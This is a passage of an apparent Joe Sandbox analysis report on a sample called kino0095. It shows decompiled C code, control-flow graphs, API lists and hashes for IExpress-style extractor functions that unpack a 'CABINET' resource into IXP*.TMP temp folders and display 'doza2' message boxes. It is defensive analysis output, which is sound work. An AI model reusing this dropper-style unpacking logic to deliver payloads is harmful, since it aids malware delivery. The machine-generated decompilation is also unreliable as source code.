                                                                                                                                                                                                                                      • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                                                    • Opcode ID: 052eb64b7e0d8d5b2eed76ffb28b13b3d19d484e6991d12b36050d13380a9611
                                                                                                                                                                                                                                    • Instruction ID: d2635d612351b3b1182b4bc11f2132c377472e583908c42d086dcf644cd97f65
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 052eb64b7e0d8d5b2eed76ffb28b13b3d19d484e6991d12b36050d13380a9611
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 837191B1A0020CAFEB669B24CCC5FFA77ADEB48344F0444E9E585D7184EA359E858F64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 374 10b4fe0-10b501a call 10b468f FindResourceA LoadResource LockResource 377 10b5161-10b5163 374->377 378 10b5020-10b5027 374->378 379 10b5029-10b5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 10b5057-10b505e call 10b4efd 378->380 379->380 383 10b507c-10b50b4 380->383 384 10b5060-10b5077 call 10b44b9 380->384 389 10b50e8-10b5104 call 10b44b9 383->389 390 10b50b6-10b50da 383->390 388 10b5107-10b510e 384->388 391 10b511d-10b511f 388->391 392 10b5110-10b5117 FreeResource 388->392 398 10b5106 389->398 390->398 402 10b50dc 390->402 394 10b513a-10b5141 391->394 395 10b5121-10b5127 391->395 392->391 400 10b515f 394->400 401 10b5143-10b514a 394->401 395->394 399 10b5129-10b5135 call 10b44b9 395->399 398->388 399->394 400->377 401->400 404 10b514c-10b5159 SendMessageA 401->404 405 10b50e3-10b50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E010B4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x10b9144 = E010B468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x10b9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x10b8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x10b8584, 0x841), 5);
				}
				_t10 = E010B4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E010B4CA0, E010B4CC0, E010B4980, E010B4A50, E010B4AD0, E010B4B60, E010B4BC0, 1, 0x10b9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x10b9148; // 0x0
						_t24 =  *0x10b8584; // 0x0
						E010B44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x10b1140, 0, E010B4CD0, 0, 0x10b9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x10b8584; // 0x0
					E010B44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x10b9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x10b9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x10b91d8; // 0x0
						if(_t47 == 0) {
							E010B44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x10b8a38 & 0x00000001) == 0 && ( *0x10b9a34 & 0x00000001) == 0) {
						SendMessageA( *0x10b8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                    0x010b4fe0
                                                                                                                                                                                                                                    0x010b4fe6
                                                                                                                                                                                                                                    0x010b4ff9
                                                                                                                                                                                                                                    0x010b500d
                                                                                                                                                                                                                                    0x010b5013
                                                                                                                                                                                                                                    0x010b501a
                                                                                                                                                                                                                                    0x010b5163
                                                                                                                                                                                                                                    0x010b5163
                                                                                                                                                                                                                                    0x010b5020
                                                                                                                                                                                                                                    0x010b5027
                                                                                                                                                                                                                                    0x010b5037
                                                                                                                                                                                                                                    0x010b5051
                                                                                                                                                                                                                                    0x010b5051
                                                                                                                                                                                                                                    0x010b5057
                                                                                                                                                                                                                                    0x010b505e
                                                                                                                                                                                                                                    0x010b50a7
                                                                                                                                                                                                                                    0x010b50ad
                                                                                                                                                                                                                                    0x010b50b4
                                                                                                                                                                                                                                    0x010b50e8
                                                                                                                                                                                                                                    0x010b50e8
                                                                                                                                                                                                                                    0x010b50ee
                                                                                                                                                                                                                                    0x010b50ff
                                                                                                                                                                                                                                    0x010b5104
                                                                                                                                                                                                                                    0x010b5106
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5106
                                                                                                                                                                                                                                    0x010b50cd
                                                                                                                                                                                                                                    0x010b50d3
                                                                                                                                                                                                                                    0x010b50da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b50dd
                                                                                                                                                                                                                                    0x010b50e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5060
                                                                                                                                                                                                                                    0x010b5060
                                                                                                                                                                                                                                    0x010b5070
                                                                                                                                                                                                                                    0x010b5075
                                                                                                                                                                                                                                    0x010b5107
                                                                                                                                                                                                                                    0x010b5107
                                                                                                                                                                                                                                    0x010b510e
                                                                                                                                                                                                                                    0x010b5111
                                                                                                                                                                                                                                    0x010b5117
                                                                                                                                                                                                                                    0x010b5117
                                                                                                                                                                                                                                    0x010b511f
                                                                                                                                                                                                                                    0x010b5121
                                                                                                                                                                                                                                    0x010b5127
                                                                                                                                                                                                                                    0x010b5135
                                                                                                                                                                                                                                    0x010b5135
                                                                                                                                                                                                                                    0x010b5127
                                                                                                                                                                                                                                    0x010b5141
                                                                                                                                                                                                                                    0x010b5159
                                                                                                                                                                                                                                    0x010b5159
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b515f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010B4FFE
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 010B5006
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 010B500D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 010B5030
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 010B5037
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 010B504A
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 010B5051
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010B5111
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010B5159
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                    • Opcode ID: ce9393eb8e04bc4996a380d629d9c9ef10575649f98229ac929c01676fe9e073
                                                                                                                                                                                                                                    • Instruction ID: 884086d7e2e923cb8445e97067201b02979e1047780578f741bab10130957e32
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9393eb8e04bc4996a380d629d9c9ef10575649f98229ac929c01676fe9e073
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6031FCB0740305BBE7705B66ACC9FE7369CE704745F044859FAC2E634AD67E9C408B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 406 10b44b9-10b44f8 407 10b4679-10b467b 406->407 408 10b44fe-10b4525 LoadStringA 406->408 411 10b467c-10b468c call 10b6ce0 407->411 409 10b4562-10b4568 408->409 410 10b4527-10b452e call 10b681f 408->410 413 10b456b-10b4570 409->413 420 10b453f 410->420 421 10b4530-10b453d call 10b67c9 410->421 413->413 416 10b4572-10b457c 413->416 418 10b45c9-10b45cb 416->418 419 10b457e-10b4580 416->419 424 10b45cd-10b45cf 418->424 425 10b4607-10b4617 LocalAlloc 418->425 422 10b4583-10b4588 419->422 426 10b4544-10b4554 MessageBoxA 420->426 421->420 421->426 422->422 429 10b458a-10b458c 422->429 431 10b45d2-10b45d7 424->431 427 10b455a-10b455d 425->427 428 10b461d-10b4628 call 10b1680 425->428 426->427 427->411 436 10b462d-10b463d MessageBeep call 10b681f 428->436 433 10b458f-10b4594 429->433 431->431 434 10b45d9-10b45ed LocalAlloc 431->434 433->433 437 10b4596-10b45ad LocalAlloc 433->437 434->427 435 10b45f3-10b4605 call 10b171e 434->435 435->436 444 10b463f-10b464c call 10b67c9 436->444 445 10b464e 436->445 437->427 440 10b45af-10b45c7 call 10b171e 437->440 440->436 444->445 448 10b4653-10b4677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x10b8004; // 0x72151d89
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x10b8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x10b9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E010B1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E010B171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E010B171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E010B681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E010B67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E010B681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E010B67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E010B6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                    0x010b44b9
                                                                                                                                                                                                                                    0x010b44c4
                                                                                                                                                                                                                                    0x010b44cb
                                                                                                                                                                                                                                    0x010b44d8
                                                                                                                                                                                                                                    0x010b44e4
                                                                                                                                                                                                                                    0x010b44eb
                                                                                                                                                                                                                                    0x010b44ee
                                                                                                                                                                                                                                    0x010b44ef
                                                                                                                                                                                                                                    0x010b44ef
                                                                                                                                                                                                                                    0x010b44f1
                                                                                                                                                                                                                                    0x010b44f7
                                                                                                                                                                                                                                    0x010b44f8
                                                                                                                                                                                                                                    0x010b467b
                                                                                                                                                                                                                                    0x010b44fe
                                                                                                                                                                                                                                    0x010b4509
                                                                                                                                                                                                                                    0x010b4518
                                                                                                                                                                                                                                    0x010b4525
                                                                                                                                                                                                                                    0x010b4562
                                                                                                                                                                                                                                    0x010b4568
                                                                                                                                                                                                                                    0x010b4568
                                                                                                                                                                                                                                    0x010b456b
                                                                                                                                                                                                                                    0x010b456b
                                                                                                                                                                                                                                    0x010b456d
                                                                                                                                                                                                                                    0x010b456e
                                                                                                                                                                                                                                    0x010b4572
                                                                                                                                                                                                                                    0x010b4578
                                                                                                                                                                                                                                    0x010b457c
                                                                                                                                                                                                                                    0x010b45cb
                                                                                                                                                                                                                                    0x010b4607
                                                                                                                                                                                                                                    0x010b4607
                                                                                                                                                                                                                                    0x010b460d
                                                                                                                                                                                                                                    0x010b4613
                                                                                                                                                                                                                                    0x010b4617
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b461d
                                                                                                                                                                                                                                    0x010b4623
                                                                                                                                                                                                                                    0x010b4626
                                                                                                                                                                                                                                    0x010b4628
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4628
                                                                                                                                                                                                                                    0x010b45cd
                                                                                                                                                                                                                                    0x010b45cd
                                                                                                                                                                                                                                    0x010b45cf
                                                                                                                                                                                                                                    0x010b45cf
                                                                                                                                                                                                                                    0x010b45d2
                                                                                                                                                                                                                                    0x010b45d2
                                                                                                                                                                                                                                    0x010b45d4
                                                                                                                                                                                                                                    0x010b45d5
                                                                                                                                                                                                                                    0x010b45db
                                                                                                                                                                                                                                    0x010b45de
                                                                                                                                                                                                                                    0x010b45e3
                                                                                                                                                                                                                                    0x010b45e9
                                                                                                                                                                                                                                    0x010b45ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b45f3
                                                                                                                                                                                                                                    0x010b45fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4602
                                                                                                                                                                                                                                    0x010b45ed
                                                                                                                                                                                                                                    0x010b457e
                                                                                                                                                                                                                                    0x010b457e
                                                                                                                                                                                                                                    0x010b4580
                                                                                                                                                                                                                                    0x010b4580
                                                                                                                                                                                                                                    0x010b4583
                                                                                                                                                                                                                                    0x010b4583
                                                                                                                                                                                                                                    0x010b4585
                                                                                                                                                                                                                                    0x010b4586
                                                                                                                                                                                                                                    0x010b458a
                                                                                                                                                                                                                                    0x010b458c
                                                                                                                                                                                                                                    0x010b458f
                                                                                                                                                                                                                                    0x010b458f
                                                                                                                                                                                                                                    0x010b4591
                                                                                                                                                                                                                                    0x010b4592
                                                                                                                                                                                                                                    0x010b459b
                                                                                                                                                                                                                                    0x010b459e
                                                                                                                                                                                                                                    0x010b45a3
                                                                                                                                                                                                                                    0x010b45a9
                                                                                                                                                                                                                                    0x010b45ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b45af
                                                                                                                                                                                                                                    0x010b45af
                                                                                                                                                                                                                                    0x010b45bf
                                                                                                                                                                                                                                    0x010b462d
                                                                                                                                                                                                                                    0x010b4630
                                                                                                                                                                                                                                    0x010b463d
                                                                                                                                                                                                                                    0x010b464e
                                                                                                                                                                                                                                    0x010b464e
                                                                                                                                                                                                                                    0x010b463f
                                                                                                                                                                                                                                    0x010b4640
                                                                                                                                                                                                                                    0x010b4647
                                                                                                                                                                                                                                    0x010b464c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b464c
                                                                                                                                                                                                                                    0x010b4666
                                                                                                                                                                                                                                    0x010b466d
                                                                                                                                                                                                                                    0x010b466f
                                                                                                                                                                                                                                    0x010b4675
                                                                                                                                                                                                                                    0x010b4675
                                                                                                                                                                                                                                    0x010b45ad
                                                                                                                                                                                                                                    0x010b4527
                                                                                                                                                                                                                                    0x010b452e
                                                                                                                                                                                                                                    0x010b453f
                                                                                                                                                                                                                                    0x010b453f
                                                                                                                                                                                                                                    0x010b4530
                                                                                                                                                                                                                                    0x010b4531
                                                                                                                                                                                                                                    0x010b4538
                                                                                                                                                                                                                                    0x010b453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b453d
                                                                                                                                                                                                                                    0x010b4554
                                                                                                                                                                                                                                    0x010b455a
                                                                                                                                                                                                                                    0x010b455a
                                                                                                                                                                                                                                    0x010b455a
                                                                                                                                                                                                                                    0x010b4525
                                                                                                                                                                                                                                    0x010b468c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 010B45A3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 010B45E3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 010B460D
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 010B4630
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 010B4666
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 010B466F
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010B686E
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: GetSystemMetrics.USER32(0000004A), ref: 010B68A7
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010B68CC
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,?,0000000C), ref: 010B68F4
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: RegCloseKey.ADVAPI32(?), ref: 010B6902
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$doza2
                                                                                                                                                                                                                                    • API String ID: 3244514340-3130468218
                                                                                                                                                                                                                                    • Opcode ID: cb23c313fbce0aaea792adf2b729bf2a3d57bb88e68df11465b7ae8447a30f92
                                                                                                                                                                                                                                    • Instruction ID: d53fc65b1c9559e39e10d0ef57780a8e7272642edac5396482d3fe4aeb9e36e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb23c313fbce0aaea792adf2b729bf2a3d57bb88e68df11465b7ae8447a30f92
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90510771A00219ABDB619E28DCC8BEA7BB8EF45300F004595EDCAF7246DB36DE05CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E010B53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x10b8004; // 0x72151d89
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E010B171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E010B1680(_t32, 0x104, _t20);
					E010B658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E010B6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x10b8a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                    0x010b53ac
                                                                                                                                                                                                                                    0x010b53b3
                                                                                                                                                                                                                                    0x010b53b9
                                                                                                                                                                                                                                    0x010b53bb
                                                                                                                                                                                                                                    0x010b53bd
                                                                                                                                                                                                                                    0x010b53bf
                                                                                                                                                                                                                                    0x010b53d1
                                                                                                                                                                                                                                    0x010b53d6
                                                                                                                                                                                                                                    0x010b53e0
                                                                                                                                                                                                                                    0x010b53e2
                                                                                                                                                                                                                                    0x010b53f5
                                                                                                                                                                                                                                    0x010b53fb
                                                                                                                                                                                                                                    0x010b5402
                                                                                                                                                                                                                                    0x010b540b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5413
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5415
                                                                                                                                                                                                                                    0x010b5416
                                                                                                                                                                                                                                    0x010b5427
                                                                                                                                                                                                                                    0x010b542a
                                                                                                                                                                                                                                    0x010b542b
                                                                                                                                                                                                                                    0x010b5434
                                                                                                                                                                                                                                    0x010b5434
                                                                                                                                                                                                                                    0x010b543a
                                                                                                                                                                                                                                    0x010b544c
                                                                                                                                                                                                                                    0x010b544c
                                                                                                                                                                                                                                    0x010b5452
                                                                                                                                                                                                                                    0x010b545a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b545e
                                                                                                                                                                                                                                    0x010b545f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B171E: _vsnprintf.MSVCRT ref: 010B1750
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B53FB
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5402
